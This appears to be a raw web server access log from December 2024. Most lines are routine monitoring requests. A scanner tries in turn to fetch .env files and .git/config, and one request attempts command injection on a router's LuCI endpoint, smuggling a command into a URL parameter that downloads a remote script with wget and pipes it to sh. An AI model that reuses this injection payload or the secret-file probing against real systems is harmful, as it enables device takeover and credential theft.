194.50.16.198 - - [02/Dec/2024:14:39:33 +0100] "GET /login.asp HTTP/1.1" 404 314 "-" "-"
212.91.246.72 - - [02/Dec/2024:14:39:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:14:40:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.163.250 - - [02/Dec/2024:14:40:45 +0100] "\x16\x03\x01" 501 318 "-" "-"
179.43.163.250 - - [02/Dec/2024:14:40:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.163.250 - - [02/Dec/2024:14:40:45 +0100] "HELP" 501 319 "-" "-"
179.43.163.250 - - [02/Dec/2024:14:40:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "l9tcpid/v1.1.0"
212.91.246.72 - - [02/Dec/2024:14:41:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.163.250 - - [02/Dec/2024:14:41:50 +0100] "\x16\x03\x01" 501 318 "-" "-"
179.43.163.250 - - [02/Dec/2024:14:41:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.163.250 - - [02/Dec/2024:14:41:50 +0100] "HELP" 501 319 "-" "-"
179.43.163.250 - - [02/Dec/2024:14:41:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "l9tcpid/v1.1.0"
179.43.163.250 - - [02/Dec/2024:14:41:51 +0100] "GET /.env.docker-compose HTTP/1.1" 404 324 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:14:41:52 +0100] "GET /.env.production HTTP/1.1" 404 320 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:14:41:52 +0100] "GET /.env.sandbox HTTP/1.1" 404 317 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:14:41:53 +0100] "GET /data/.git/config HTTP/1.1" 404 321 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:14:41:53 +0100] "GET /static../.git/config HTTP/1.1" 404 325 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:14:41:53 +0100] "GET /.env.local HTTP/1.1" 404 315 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:14:41:53 +0100] "GET /.env.test HTTP/1.1" 404 314 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:14:41:54 +0100] "GET /.env.production.local HTTP/1.1" 404 326 "-" "l9explore/1.2.2"
31.220.1.88 - - [02/Dec/2024:14:41:59 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/Dec/2024:14:42:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
177.74.193.41 - - [02/Dec/2024:14:43:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [02/Dec/2024:14:43:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:14:44:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
